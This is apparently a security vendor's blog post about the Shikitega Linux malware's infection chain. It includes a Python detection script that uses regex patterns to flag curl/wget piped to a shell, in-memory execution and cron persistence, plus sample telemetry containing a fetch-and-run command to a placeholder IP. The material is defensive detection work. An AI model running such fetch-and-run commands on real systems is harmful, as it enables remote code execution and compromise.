A new stealthy Linux malware strain named Shikitega is on the prowl for victims. Its operators run highly evasive attacks against Linux servers and IoT devices. Analysis of Shikitega shows a multi-stage infection chain designed to take full control of the compromised system, exploit known Linux vulnerabilities to escalate privileges, establish persistence, and drop additional payloads, including a Monero cryptocurrency miner.
To assist security practitioners in spotting attacks involving this new Linux malware, Sittikorn Sangrattanapitak has released a rule that detects the execution of the Shikitega script.
This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, SentinelOne, Graylog, Regex Grep, CrowdStrike, Microsoft PowerShell, RSA NetWitness, Chronicle Security, Microsoft Defender ATP, Snowflake, Securonix, Apache Kafka ksqlDB, Carbon Black, Open Distro, and AWS OpenSearch.
The rule is aligned with the MITRE ATT&CK® framework v10, addressing the Defense Evasion and Execution tactics, with Obfuscated Files or Information (T1027) and System Services (T1569) as the primary techniques.
SOC Prime has revolutionized the way that security teams access threat detection content. We harness the power of collaborative cyber defense, working hard towards facilitating a cross-border “Cyber NATO” to effectively withstand emerging threats. Click the Explore Detections button below to instantly reach dedicated detections and dive into relevant cyber threat contexts without registration directly from the Cyber Threats Search Engine.
Security researchers from AT&T Alien Labs documented the new malware strain earlier this September. The initial compromise vector used by the threat actors behind Shikitega is still unknown. Once on the system, the malware fetches further payloads from its command-and-control (C2) server and runs them in memory, leaving little on disk for file-based scanners to find. It also deploys Metasploit’s ‘Mettle’ meterpreter payload, which gives the operators remote control of the infected host and a platform from which to elevate privileges and carry out a wide range of follow-on actions. To evade antivirus detection, Shikitega encodes its stages with a polymorphic encoder (Metasploit’s ‘Shikata Ga Nai’ encoder, from which the malware takes its name), so that each generated instance looks different to signature-based scanners.
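The detection rule itself is not reproduced here, but the chain described above (fetch a payload from a remote server, run it in memory, then persist) is the kind of behaviour a SOC can score from process-creation telemetry rather than from file hashes, which a polymorphic encoder defeats. The block below is an added example, written for this page; it is not SOC Prime’s rule, not the AT&T Alien Labs analysis, and not Shikitega-specific. The event field names (`exe`, `cmdline`, `session`), the sample events, and the IP addresses are all constructed assumptions standing in for whatever your EDR or auditd pipeline emits; the ATT&CK mapping in the comments is my own.

```python
"""Behaviour-based scoring of a fetch-and-run Linux infection chain.

Added example, not a vendor rule.  Each execve-style event is a dict with
assumed fields: exe (resolved binary path, as /proc/<pid>/exe reports it),
cmdline (full command line) and session (an opaque key that ties a process
tree together: audit session id, container id, or a ppid chain).
"""
import re

# Fetch-and-pipe-to-shell: curl/wget output flowing into sh/bash/dash,
# possibly through other filters (e.g. base64 -d).  ATT&CK T1105 + T1059.004.
FETCH_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b", re.I)

# Binaries started from world-writable staging directories.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# memfd_create()-backed or fd-only executables show up in /proc/<pid>/exe
# as "/memfd:<name> (deleted)" or are exec'd via /proc/self/fd/N.  ATT&CK T1620.
MEMFD_RE = re.compile(r"^/memfd:|^/proc/self/fd/\d+|^/dev/fd/\d+")

# Persistence via cron or systemd units.  ATT&CK T1053.003 / T1543.002 / T1569.
PERSIST_RE = re.compile(
    r"\bcrontab\s+-|/etc/cron\.d/|\bsystemctl\s+enable\b|/etc/systemd/system/", re.I
)


def remote_fetch_to_shell(ev):
    return bool(FETCH_RE.search(ev.get("cmdline", "")))


def exec_from_memory(ev):
    return bool(MEMFD_RE.match(ev.get("exe", "")))


def exec_from_writable_dir(ev):
    return ev.get("exe", "").startswith(WRITABLE_DIRS)


def persistence_install(ev):
    return bool(PERSIST_RE.search(ev.get("cmdline", "")))


# Rule name -> (predicate, weight).  Strong behaviours weigh more; a single
# binary in /tmp is common enough on build hosts that it only adds context.
RULES = {
    "remote_fetch_to_shell": (remote_fetch_to_shell, 2),
    "exec_from_memory": (exec_from_memory, 2),
    "exec_from_writable_dir": (exec_from_writable_dir, 1),
    "persistence_install": (persistence_install, 1),
}


def score_event(ev):
    """Names of the rules a single event matches, in RULES order."""
    return [name for name, (check, _) in RULES.items() if check(ev)]


def triage(events, threshold=3):
    """Correlate hits per session; alert when distinct behaviours reach threshold.

    Returns {session: {"score": int, "rules": sorted distinct rule names}}.
    Counting distinct rules (not repeated events) keeps one noisy loop from
    inflating a session's score.
    """
    hits = {}
    for ev in events:
        matched = score_event(ev)
        if matched:
            hits.setdefault(ev["session"], set()).update(matched)
    alerts = {}
    for session, rules in hits.items():
        score = sum(RULES[r][1] for r in rules)
        if score >= threshold:
            alerts[session] = {"score": score, "rules": sorted(rules)}
    return alerts


# Constructed sample telemetry (TEST-NET addresses, invented paths).
SAMPLE_EVENTS = [
    {"exe": "/usr/bin/ls", "cmdline": "ls -la /srv", "session": 1},
    {"exe": "/bin/sh", "cmdline": 'sh -c "curl -fsSL http://198.51.100.7/x.sh | sh"', "session": 2},
    {"exe": "/memfd:x (deleted)", "cmdline": "./x", "session": 2},
    {"exe": "/usr/bin/crontab", "cmdline": "crontab -", "session": 2},
    {"exe": "/tmp/.build/cc1", "cmdline": "/tmp/.build/cc1 main.c", "session": 3},
    {"exe": "/bin/sh", "cmdline": "sh -c 'wget -qO- http://203.0.113.9/list | grep foo'", "session": 4},
]

if __name__ == "__main__":
    for session, alert in triage(SAMPLE_EVENTS).items():
        print(f"session {session}: score {alert['score']} rules {alert['rules']}")
```

Session 2 alone crosses the threshold because it shows three independent behaviours; the lone `/tmp` binary in session 3 and the `wget | grep` in session 4 do not, which is the point of correlating by process tree instead of alerting on each pattern in isolation. Tune the weights and threshold against a week of your own telemetry before deploying.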
Join SOC Prime’s Detection as Code platform to unlock access to the world’s largest pool of detection content created by reputable experts in the field. Rest assured that you will not be missing out on any important updates since our SOC experts strive to publish all the latest detections, maintaining a swift response to the latest threats.